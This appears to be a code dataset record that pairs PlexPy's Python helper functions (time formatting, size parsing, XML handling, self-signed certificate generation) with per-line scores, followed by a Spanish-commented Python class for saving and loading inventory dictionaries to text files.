time.strftime("%H:%M:%S", gmtime) else: minutes = time.strftime("%M:%S", gmtime) return minutes def convert_milliseconds_to_minutes(ms): if str(ms).isdigit(): seconds = float(ms) / 1000 minutes = round(seconds / 60, 0) return math.trunc(minutes) return 0 def convert_seconds(s): gmtime = time.gmtime(s) if s > 3600: minutes = time.strftime("%H:%M:%S", gmtime) else: minutes = time.strftime("%M:%S", gmtime) return minutes def today(): today = datetime.date.today() yyyymmdd = datetime.date.isoformat(today) return yyyymmdd def now(): now = datetime.datetime.now() return now.strftime("%Y-%m-%d %H:%M:%S") def human_duration(s, sig='dhms'): hd = '' if str(s).isdigit() and s > 0: d = int(s / 84600) h = int((s % 84600) / 3600) m = int(((s % 84600) % 3600) / 60) s = int(((s % 84600) % 3600) % 60) hd_list = [] if sig >= 'd' and d > 0: d = d + 1 if sig == 'd' and h >= 12 else d hd_list.append(str(d) + ' days') if sig >= 'dh' and h > 0: h = h + 1 if sig == 'dh' and m >= 30 else h hd_list.append(str(h) + ' hrs') if sig >= 'dhm' and m > 0: m = m + 1 if sig == 'dhm' and s >= 30 else m hd_list.append(str(m) + ' mins') if sig >= 'dhms' and s > 0: 
hd_list.append(str(s) + ' secs') hd = ' '.join(hd_list) else: hd = '0' return hd def get_age(date): try: split_date = date.split('-') except: return False try: days_old = int(split_date[0]) * 365 + int(split_date[1]) * 30 + int(split_date[2]) except IndexError: days_old = False return days_old def bytes_to_mb(bytes): mb = int(bytes) / 1048576 size = '%.1f MB' % mb return size def mb_to_bytes(mb_str): result = re.search('^(\d+(?:\.\d+)?)\s?(?:mb)?', mb_str, flags=re.I) if result: return int(float(result.group(1)) * 1048576) def piratesize(size): split = size.split(" ") factor = float(split[0]) unit = split[1].upper() if unit == 'MiB': size = factor * 1048576 elif unit == 'MB': size = factor * 1000000 elif unit == 'GiB': size = factor * 1073741824 elif unit == 'GB': size = factor * 1000000000 elif unit == 'KiB': size = factor * 1024 elif unit == 'KB': size = factor * 1000 elif unit == "B": size = factor else: size = 0 return size def replace_all(text, dic, normalize=False): if not text: return '' for i, j in dic.iteritems(): if normalize: try: if sys.platform == 'darwin': j = unicodedata.normalize('NFD', j) else: j = unicodedata.normalize('NFC', j) except TypeError: j = unicodedata.normalize('NFC', j.decode(plexpy.SYS_ENCODING, 'replace')) text = text.replace(i, j) return text def replace_illegal_chars(string, type="file"): if type == "file": string = re.sub('[\?"*:|<>/]', '_', string) if type == "folder": string = re.sub('[:\?<>"|]', '_', string) return string def cleanName(string): pass1 = latinToAscii(string).lower() out_string = re.sub('[\.\-\/\!\@\#\$\%\^\&\*\(\)\+\-\"\'\,\;\:\[\]\{\}\<\>\=\_]', '', pass1).encode('utf-8') return out_string def cleanTitle(title): title = re.sub('[\.\-\/\_]', ' ', title).lower() # Strip out extra whitespace title = ' '.join(title.split()) title = title.title() return title def split_path(f): """ Split a path into components, starting with the drive letter (if any). 
Given a path, os.path.join(*split_path(f)) should be path equal to f. """ components = [] drive, path = os.path.splitdrive(f) # Strip the folder from the path, iterate until nothing is left while True: path, folder = os.path.split(path) if folder: components.append(folder) else: if path: components.append(path) break # Append the drive (if any) if drive: components.append(drive) # Reverse components components.reverse() # Done return components def extract_logline(s): # Default log format pattern = re.compile(r'(?P<timestamp>.*?)\s\-\s(?P<level>.*?)\s*\:\:\s(?P<thread>.*?)\s\:\s(?P<message>.*)', re.VERBOSE) match = pattern.match(s) if match: timestamp = match.group("timestamp") level = match.group("level") thread = match.group("thread") message = match.group("message") return (timestamp, level, thread, message) else: return None def split_string(mystring, splitvar=','): mylist = [] for each_word in mystring.split(splitvar): mylist.append(each_word.strip()) return mylist def create_https_certificates(ssl_cert, ssl_key): """ Create a pair of self-signed HTTPS certificares and store in them in 'ssl_cert' and 'ssl_key'. Method assumes pyOpenSSL is installed. This code is stolen from SickBeard (http://github.com/midgetspy/Sick-Beard). 
""" from plexpy import logger from OpenSSL import crypto from certgen import createKeyPair, createCertRequest, createCertificate, \ TYPE_RSA, serial # Create the CA Certificate cakey = createKeyPair(TYPE_RSA, 2048) careq = createCertRequest(cakey, CN="Certificate Authority") cacert = createCertificate(careq, (careq, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years pkey = createKeyPair(TYPE_RSA, 2048) req = createCertRequest(pkey, CN="PlexPy") cert = createCertificate(req, (cacert, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years # Save the key and certificate to disk try: with open(ssl_key, "w") as fp: fp.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)) with open(ssl_cert, "w") as fp: fp.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) except IOError as e: logger.error("Error creating SSL key and certificate: %s", e) return False return True def cast_to_int(s): try: return int(s) except ValueError: return -1 def cast_to_float(s): try: return float(s) except ValueError: return -1 def convert_xml_to_json(xml): o = xmltodict.parse(xml) return json.dumps(o) def convert_xml_to_dict(xml): o = xmltodict.parse(xml) return o def get_percent(value1, value2): if str(value1).isdigit() and str(value2).isdigit(): value1 = cast_to_float(value1) value2 = cast_to_float(value2) else: return 0 if value1 != 0 and value2 != 0: percent = (value1 / value2) * 100 else: percent = 0 return math.trunc(percent) def parse_xml(unparsed=None): from plexpy import logger if unparsed: try: xml_parse = minidom.parseString(unparsed) return xml_parse except Exception, e: logger.warn("Error parsing XML. 
%s" % e) return [] except: logger.warn("Error parsing XML.") return [] else: logger.warn("XML parse request made but no data received.") return [] """ Validate xml keys to make sure they exist and return their attribute value, return blank value is none found """ def get_xml_attr(xml_key, attribute, return_bool=False, default_return=''): if xml_key.getAttribute(attribute): if return_bool: return True else: return xml_key.getAttribute(attribute) else: if return_bool: return False else: return default_return def process_json_kwargs(json_kwargs): params = {} if json_kwargs: params = json.loads(json_kwargs) return params def sanitize(string): if string: return unicode(string).replace('<','&lt;').replace('>','&gt;') else: return ''
[ "# This file is part of PlexPy.\n", "#\n", "# PlexPy is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# PlexPy is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with PlexPy. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "from operator import itemgetter\n", "from xml.dom import minidom\n", "\n", "import unicodedata\n", "import plexpy\n", "import datetime\n", "import fnmatch\n", "import shutil\n", "import time\n", "import sys\n", "import re\n", "import os\n", "import json\n", "import xmltodict\n", "import math\n", "\n", "\n", "def multikeysort(items, columns):\n", " comparers = [((itemgetter(col[1:].strip()), -1) if col.startswith('-') else (itemgetter(col.strip()), 1)) for col in columns]\n", "\n", " def comparer(left, right):\n", " for fn, mult in comparers:\n", " result = cmp(fn(left), fn(right))\n", " if result:\n", " return mult * result\n", " else:\n", " return 0\n", "\n", " return sorted(items, cmp=comparer)\n", "\n", "\n", "def checked(variable):\n", " if variable:\n", " return 'Checked'\n", " else:\n", " return ''\n", "\n", "\n", "def radio(variable, pos):\n", "\n", " if variable == pos:\n", " return 'Checked'\n", " else:\n", " return ''\n", "\n", "\n", "def latinToAscii(unicrap):\n", " \"\"\"\n", " From couch potato\n", " \"\"\"\n", " xlate = {\n", " 0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A',\n", " 0xc6: 'Ae', 0xc7: 'C',\n", " 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E', 0x86: 'e',\n", " 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I',\n", " 
0xd0: 'Th', 0xd1: 'N',\n", " 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O',\n", " 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U',\n", " 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss',\n", " 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a',\n", " 0xe6: 'ae', 0xe7: 'c',\n", " 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e', 0x0259: 'e',\n", " 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i',\n", " 0xf0: 'th', 0xf1: 'n',\n", " 0xf2: 'o', 0xf3: 'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o',\n", " 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u',\n", " 0xfd: 'y', 0xfe: 'th', 0xff: 'y',\n", " 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}',\n", " 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}',\n", " 0xa9: '{C}', 0xaa: '{^a}', 0xab: '&lt;&lt;', 0xac: '{not}',\n", " 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}',\n", " 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: \"'\",\n", " 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}',\n", " 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '&gt;&gt;',\n", " 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?',\n", " 0xd7: '*', 0xf7: '/'\n", " }\n", "\n", " r = ''\n", " if unicrap:\n", " for i in unicrap:\n", " if ord(i) in xlate:\n", " r += xlate[ord(i)]\n", " elif ord(i) >= 0x80:\n", " pass\n", " else:\n", " r += str(i)\n", "\n", " return r\n", "\n", "\n", "def convert_milliseconds(ms):\n", "\n", " seconds = ms / 1000\n", " gmtime = time.gmtime(seconds)\n", " if seconds > 3600:\n", " minutes = time.strftime(\"%H:%M:%S\", gmtime)\n", " else:\n", " minutes = time.strftime(\"%M:%S\", gmtime)\n", "\n", " return minutes\n", "\n", "def convert_milliseconds_to_minutes(ms):\n", "\n", " if str(ms).isdigit():\n", " seconds = float(ms) / 1000\n", " minutes = round(seconds / 60, 0)\n", "\n", " return math.trunc(minutes)\n", "\n", " return 0\n", "\n", "def convert_seconds(s):\n", "\n", " gmtime = time.gmtime(s)\n", " if s > 3600:\n", " minutes = time.strftime(\"%H:%M:%S\", gmtime)\n", " else:\n", " 
minutes = time.strftime(\"%M:%S\", gmtime)\n", "\n", " return minutes\n", "\n", "\n", "def today():\n", " today = datetime.date.today()\n", " yyyymmdd = datetime.date.isoformat(today)\n", " return yyyymmdd\n", "\n", "\n", "def now():\n", " now = datetime.datetime.now()\n", " return now.strftime(\"%Y-%m-%d %H:%M:%S\")\n", "\n", "def human_duration(s, sig='dhms'):\n", "\n", " hd = ''\n", "\n", " if str(s).isdigit() and s > 0:\n", " d = int(s / 84600)\n", " h = int((s % 84600) / 3600)\n", " m = int(((s % 84600) % 3600) / 60)\n", " s = int(((s % 84600) % 3600) % 60)\n", "\n", " hd_list = []\n", " if sig >= 'd' and d > 0:\n", " d = d + 1 if sig == 'd' and h >= 12 else d\n", " hd_list.append(str(d) + ' days')\n", "\n", " if sig >= 'dh' and h > 0:\n", " h = h + 1 if sig == 'dh' and m >= 30 else h\n", " hd_list.append(str(h) + ' hrs')\n", " \n", " if sig >= 'dhm' and m > 0:\n", " m = m + 1 if sig == 'dhm' and s >= 30 else m\n", " hd_list.append(str(m) + ' mins')\n", "\n", " if sig >= 'dhms' and s > 0:\n", " hd_list.append(str(s) + ' secs')\n", "\n", " hd = ' '.join(hd_list)\n", " else:\n", " hd = '0'\n", "\n", " return hd\n", "\n", "def get_age(date):\n", "\n", " try:\n", " split_date = date.split('-')\n", " except:\n", " return False\n", "\n", " try:\n", " days_old = int(split_date[0]) * 365 + int(split_date[1]) * 30 + int(split_date[2])\n", " except IndexError:\n", " days_old = False\n", "\n", " return days_old\n", "\n", "\n", "def bytes_to_mb(bytes):\n", "\n", " mb = int(bytes) / 1048576\n", " size = '%.1f MB' % mb\n", " return size\n", "\n", "\n", "def mb_to_bytes(mb_str):\n", " result = re.search('^(\\d+(?:\\.\\d+)?)\\s?(?:mb)?', mb_str, flags=re.I)\n", " if result:\n", " return int(float(result.group(1)) * 1048576)\n", "\n", "\n", "def piratesize(size):\n", " split = size.split(\" \")\n", " factor = float(split[0])\n", " unit = split[1].upper()\n", "\n", " if unit == 'MiB':\n", " size = factor * 1048576\n", " elif unit == 'MB':\n", " size = factor * 1000000\n", " 
elif unit == 'GiB':\n", " size = factor * 1073741824\n", " elif unit == 'GB':\n", " size = factor * 1000000000\n", " elif unit == 'KiB':\n", " size = factor * 1024\n", " elif unit == 'KB':\n", " size = factor * 1000\n", " elif unit == \"B\":\n", " size = factor\n", " else:\n", " size = 0\n", "\n", " return size\n", "\n", "\n", "def replace_all(text, dic, normalize=False):\n", "\n", " if not text:\n", " return ''\n", "\n", " for i, j in dic.iteritems():\n", " if normalize:\n", " try:\n", " if sys.platform == 'darwin':\n", " j = unicodedata.normalize('NFD', j)\n", " else:\n", " j = unicodedata.normalize('NFC', j)\n", " except TypeError:\n", " j = unicodedata.normalize('NFC', j.decode(plexpy.SYS_ENCODING, 'replace'))\n", " text = text.replace(i, j)\n", " return text\n", "\n", "\n", "def replace_illegal_chars(string, type=\"file\"):\n", " if type == \"file\":\n", " string = re.sub('[\\?\"*:|<>/]', '_', string)\n", " if type == \"folder\":\n", " string = re.sub('[:\\?<>\"|]', '_', string)\n", "\n", " return string\n", "\n", "\n", "def cleanName(string):\n", "\n", " pass1 = latinToAscii(string).lower()\n", " out_string = re.sub('[\\.\\-\\/\\!\\@\\#\\$\\%\\^\\&\\*\\(\\)\\+\\-\\\"\\'\\,\\;\\:\\[\\]\\{\\}\\<\\>\\=\\_]', '', pass1).encode('utf-8')\n", "\n", " return out_string\n", "\n", "\n", "def cleanTitle(title):\n", "\n", " title = re.sub('[\\.\\-\\/\\_]', ' ', title).lower()\n", "\n", " # Strip out extra whitespace\n", " title = ' '.join(title.split())\n", "\n", " title = title.title()\n", "\n", " return title\n", "\n", "\n", "def split_path(f):\n", " \"\"\"\n", " Split a path into components, starting with the drive letter (if any). 
Given\n", " a path, os.path.join(*split_path(f)) should be path equal to f.\n", " \"\"\"\n", "\n", " components = []\n", " drive, path = os.path.splitdrive(f)\n", "\n", " # Strip the folder from the path, iterate until nothing is left\n", " while True:\n", " path, folder = os.path.split(path)\n", "\n", " if folder:\n", " components.append(folder)\n", " else:\n", " if path:\n", " components.append(path)\n", "\n", " break\n", "\n", " # Append the drive (if any)\n", " if drive:\n", " components.append(drive)\n", "\n", " # Reverse components\n", " components.reverse()\n", "\n", " # Done\n", " return components\n", "\n", "\n", "def extract_logline(s):\n", " # Default log format\n", " pattern = re.compile(r'(?P<timestamp>.*?)\\s\\-\\s(?P<level>.*?)\\s*\\:\\:\\s(?P<thread>.*?)\\s\\:\\s(?P<message>.*)', re.VERBOSE)\n", " match = pattern.match(s)\n", " if match:\n", " timestamp = match.group(\"timestamp\")\n", " level = match.group(\"level\")\n", " thread = match.group(\"thread\")\n", " message = match.group(\"message\")\n", " return (timestamp, level, thread, message)\n", " else:\n", " return None\n", "\n", "\n", "def split_string(mystring, splitvar=','):\n", " mylist = []\n", " for each_word in mystring.split(splitvar):\n", " mylist.append(each_word.strip())\n", " return mylist\n", "\n", "def create_https_certificates(ssl_cert, ssl_key):\n", " \"\"\"\n", " Create a pair of self-signed HTTPS certificares and store in them in\n", " 'ssl_cert' and 'ssl_key'. 
Method assumes pyOpenSSL is installed.\n", "\n", " This code is stolen from SickBeard (http://github.com/midgetspy/Sick-Beard).\n", " \"\"\"\n", "\n", " from plexpy import logger\n", "\n", " from OpenSSL import crypto\n", " from certgen import createKeyPair, createCertRequest, createCertificate, \\\n", " TYPE_RSA, serial\n", "\n", " # Create the CA Certificate\n", " cakey = createKeyPair(TYPE_RSA, 2048)\n", " careq = createCertRequest(cakey, CN=\"Certificate Authority\")\n", " cacert = createCertificate(careq, (careq, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years\n", "\n", " pkey = createKeyPair(TYPE_RSA, 2048)\n", " req = createCertRequest(pkey, CN=\"PlexPy\")\n", " cert = createCertificate(req, (cacert, cakey), serial, (0, 60 * 60 * 24 * 365 * 10)) # ten years\n", "\n", " # Save the key and certificate to disk\n", " try:\n", " with open(ssl_key, \"w\") as fp:\n", " fp.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey))\n", " with open(ssl_cert, \"w\") as fp:\n", " fp.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))\n", " except IOError as e:\n", " logger.error(\"Error creating SSL key and certificate: %s\", e)\n", " return False\n", "\n", " return True\n", "\n", "\n", "def cast_to_int(s):\n", " try:\n", " return int(s)\n", " except ValueError:\n", " return -1\n", "\n", "def cast_to_float(s):\n", " try:\n", " return float(s)\n", " except ValueError:\n", " return -1\n", "\n", "def convert_xml_to_json(xml):\n", " o = xmltodict.parse(xml)\n", " return json.dumps(o)\n", "\n", "\n", "def convert_xml_to_dict(xml):\n", " o = xmltodict.parse(xml)\n", " return o\n", "\n", "\n", "def get_percent(value1, value2):\n", "\n", " if str(value1).isdigit() and str(value2).isdigit():\n", " value1 = cast_to_float(value1)\n", " value2 = cast_to_float(value2)\n", " else:\n", " return 0\n", "\n", " if value1 != 0 and value2 != 0:\n", " percent = (value1 / value2) * 100\n", " else:\n", " percent = 0\n", "\n", " return math.trunc(percent)\n", "\n", "def 
parse_xml(unparsed=None):\n", " from plexpy import logger\n", "\n", " if unparsed:\n", " try:\n", " xml_parse = minidom.parseString(unparsed)\n", " return xml_parse\n", " except Exception, e:\n", " logger.warn(\"Error parsing XML. %s\" % e)\n", " return []\n", " except:\n", " logger.warn(\"Error parsing XML.\")\n", " return []\n", " else:\n", " logger.warn(\"XML parse request made but no data received.\")\n", " return []\n", "\n", "\"\"\"\n", "Validate xml keys to make sure they exist and return their attribute value, return blank value is none found\n", "\"\"\"\n", "def get_xml_attr(xml_key, attribute, return_bool=False, default_return=''):\n", " if xml_key.getAttribute(attribute):\n", " if return_bool:\n", " return True\n", " else:\n", " return xml_key.getAttribute(attribute)\n", " else:\n", " if return_bool:\n", " return False\n", " else:\n", " return default_return\n", "\n", "def process_json_kwargs(json_kwargs):\n", " params = {}\n", " if json_kwargs:\n", " params = json.loads(json_kwargs)\n", "\n", " return params\n", "\n", "def sanitize(string):\n", " if string:\n", " return unicode(string).replace('<','&lt;').replace('>','&gt;')\n", " else:\n", " return ''" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0547945205479452, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0.02, 0, 0, 0, 0, 0, 0, 0, 0.23893805309734514, 0, 0, 0, 0, 0, 0, 0.07547169811320754, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0.019801980198019802, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0.25, 0.009174311926605505, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.028169014084507043, 0, 0.058823529411764705 ]
449
0.003214
false
from PUtils import showMessageBox class PArchivos(object): """Clase para Manejo de Archivos y Diccionarios""" _nombreArchivo = '' _dic = {} def __init__(self, nombreArchivo): """Inicializa la clase con el nombre del archivo a utilizar""" self._nombreArchivo = nombreArchivo def existeArticulo(self,KeyID): """funcion que verifica si existe un articulo en el diccionario por la llave""" if len(self._dic) != 0: if KeyID in self._dic: return True else: return False else: return False def searchArticulo(self,KeyID): """funcion que devuelve la descipcion de una llave en el diccionario""" if self.existeArticulo(KeyID): return self._dic[KeyID][0] else: return "Articulo no se encuentra Registrado" def getCArticulo(self,KeyID): """funcion que devuelve la cantidad de una llave en el diccionario de articulos""" if self.existeArticulo(KeyID): return int(self._dic[KeyID][1]) else: return 0 def getCInventario(self,KeyID): """funcion que devuelve la cantidad de una llave en el diccionario de inventario""" if self.existeArticulo(KeyID): return int(self._dic[KeyID][0]) else: return 0 def existeInventario(self,KeyID): """funcion que verifica si existe un articulo en el diccionario por la llave""" return self.existeArticulo(KeyID) def addArticulo(self,KeyID,Descripcion,Cantidad,Activo): """funcion que agrega un articulo al diccionario de articulos""" if self.existeArticulo(KeyID) == False: self._dic[KeyID]=[Descripcion,Cantidad,Activo] def addDiff(self,KeyID,Cantidad): """funcion que agrega un articulo al diccionario de diferencias""" self.addInventario(KeyID,Cantidad) def addInventario(self,KeyID,Cantidad): """funcion que agrega un articulo al diccionario de inventario""" if self.existeInventario(KeyID) == False: self._dic[KeyID]=[Cantidad] def delArticulo(self,KeyID): """funcion que remueve un articulo al diccionario de articulos""" if self.existeArticulo(KeyID) == True: del self._dic[KeyID] def delInventario(self,KeyID): """funcion que remueve un articulo al diccionario de 
inventario""" self.delArticulo(KeyID) def diffInventario(self,inventarioDic,articulosDic): """funcion que calcula las diferencias entre el diccionario de datos de articulos y de inventario""" self._dic = {} for key in sorted(inventarioDic.getDiccionario()): diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key) self.addDiff(key,diff) for key in sorted(articulosDic.getDiccionario()): if inventarioDic.existeInventario(key) == False: diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key) self.addDiff(key,diff) def saveFile(self): """Funcion que escribe un diccionario de datos a un archivo de texto""" try: archivo = open(self._nombreArchivo, "wt") for key in sorted(self._dic): if len(self._dic[key]) == 3: archivo.write("{0}:{1},{2},{3}\n".format(key,self._dic[key][0],self._dic[key][1],self._dic[key][2])) else: archivo.write("{0}:{1}\n".format(key,self._dic[key][0])) archivo.close() showMessageBox("Exportar Archivo","Archivo {0} Exportado con Exito".format(self._nombreArchivo)) except: showMessageBox("Exportar Archivo","Error al Guardar Archivo {0}".format(self._nombreArchivo)) def loadFile(self): """Funcion que lee de un archivo de texto y rellena un diccionario de datos""" try: archivo = open(self._nombreArchivo, "rt") self._dic = {} while True: linea = archivo.readline() if not linea: break linea = linea[:-1] key, lista = linea.split(":") if lista.strip() == "": listaF = [] else: listaF = lista.split(",") if len(listaF) == 3: self.addArticulo(key,listaF[0],listaF[1],listaF[2]) else: self.addInventario(key,listaF[0]) except: showMessageBox("Importar Archivo","Error al Cargar Archivo {0}".format(self._nombreArchivo)) def getDiccionario(self): """Funcion que devuelve el diccionario de datos de la clase""" dict = self._dic return dict
[ "from PUtils import showMessageBox\n", "\n", "class PArchivos(object):\n", " \"\"\"Clase para Manejo de Archivos y Diccionarios\"\"\"\n", " _nombreArchivo = ''\n", " _dic = {}\n", "\n", " def __init__(self, nombreArchivo):\n", " \"\"\"Inicializa la clase con el nombre del archivo a utilizar\"\"\"\n", " self._nombreArchivo = nombreArchivo\n", "\n", " def existeArticulo(self,KeyID):\n", " \"\"\"funcion que verifica si existe un articulo en el diccionario por la llave\"\"\"\n", " if len(self._dic) != 0:\n", " if KeyID in self._dic:\n", " return True\n", " else:\n", " return False\n", " else:\n", " return False\n", "\n", " def searchArticulo(self,KeyID):\n", " \"\"\"funcion que devuelve la descipcion de una llave en el diccionario\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return self._dic[KeyID][0]\n", " else:\n", " return \"Articulo no se encuentra Registrado\"\n", "\n", " def getCArticulo(self,KeyID):\n", " \"\"\"funcion que devuelve la cantidad de una llave en el diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return int(self._dic[KeyID][1])\n", " else:\n", " return 0\n", "\n", " def getCInventario(self,KeyID):\n", " \"\"\"funcion que devuelve la cantidad de una llave en el diccionario de inventario\"\"\"\n", " if self.existeArticulo(KeyID):\n", " return int(self._dic[KeyID][0])\n", " else:\n", " return 0\n", "\n", " def existeInventario(self,KeyID):\n", " \"\"\"funcion que verifica si existe un articulo en el diccionario por la llave\"\"\"\n", " return self.existeArticulo(KeyID)\n", "\n", " def addArticulo(self,KeyID,Descripcion,Cantidad,Activo):\n", " \"\"\"funcion que agrega un articulo al diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID) == False:\n", " self._dic[KeyID]=[Descripcion,Cantidad,Activo]\n", "\n", " def addDiff(self,KeyID,Cantidad):\n", " \"\"\"funcion que agrega un articulo al diccionario de diferencias\"\"\"\n", " self.addInventario(KeyID,Cantidad)\n", "\n", " def 
addInventario(self,KeyID,Cantidad):\n", " \"\"\"funcion que agrega un articulo al diccionario de inventario\"\"\"\n", " if self.existeInventario(KeyID) == False:\n", " self._dic[KeyID]=[Cantidad]\n", "\n", " def delArticulo(self,KeyID):\n", " \"\"\"funcion que remueve un articulo al diccionario de articulos\"\"\"\n", " if self.existeArticulo(KeyID) == True:\n", " del self._dic[KeyID]\n", "\n", " def delInventario(self,KeyID):\n", " \"\"\"funcion que remueve un articulo al diccionario de inventario\"\"\"\n", " self.delArticulo(KeyID)\n", "\n", " def diffInventario(self,inventarioDic,articulosDic):\n", " \"\"\"funcion que calcula las diferencias entre el diccionario de \n", " datos de articulos y de inventario\"\"\"\n", " self._dic = {}\n", " for key in sorted(inventarioDic.getDiccionario()):\n", " diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key)\n", " self.addDiff(key,diff)\n", "\n", " for key in sorted(articulosDic.getDiccionario()):\n", " if inventarioDic.existeInventario(key) == False:\n", " diff = inventarioDic.getCInventario(key) - articulosDic.getCArticulo(key)\n", " self.addDiff(key,diff)\n", "\n", " def saveFile(self):\n", " \"\"\"Funcion que escribe un diccionario de datos a un archivo de texto\"\"\"\n", " try:\n", " archivo = open(self._nombreArchivo, \"wt\") \n", " for key in sorted(self._dic):\n", " if len(self._dic[key]) == 3:\n", " archivo.write(\"{0}:{1},{2},{3}\\n\".format(key,self._dic[key][0],self._dic[key][1],self._dic[key][2]))\n", " else:\n", " archivo.write(\"{0}:{1}\\n\".format(key,self._dic[key][0]))\n", " archivo.close()\n", " showMessageBox(\"Exportar Archivo\",\"Archivo {0} Exportado con Exito\".format(self._nombreArchivo))\n", " except:\n", " showMessageBox(\"Exportar Archivo\",\"Error al Guardar Archivo {0}\".format(self._nombreArchivo))\n", "\n", " def loadFile(self):\n", " \"\"\"Funcion que lee de un archivo de texto y rellena un diccionario de datos\"\"\"\n", " try:\n", " archivo = open(self._nombreArchivo, 
\"rt\") \n", " self._dic = {}\n", " while True: \n", " linea = archivo.readline() \n", " if not linea: \n", " break \n", " linea = linea[:-1] \n", " key, lista = linea.split(\":\")\n", " if lista.strip() == \"\":\n", " listaF = []\n", " else: \n", " listaF = lista.split(\",\")\n", " if len(listaF) == 3:\n", " self.addArticulo(key,listaF[0],listaF[1],listaF[2])\n", " else:\n", " self.addInventario(key,listaF[0])\n", " except:\n", " showMessageBox(\"Importar Archivo\",\"Error al Cargar Archivo {0}\".format(self._nombreArchivo))\n", "\n", " def getDiccionario(self):\n", " \"\"\"Funcion que devuelve el diccionario de datos de la clase\"\"\"\n", " dict = self._dic\n", " return dict\n", "\n" ]
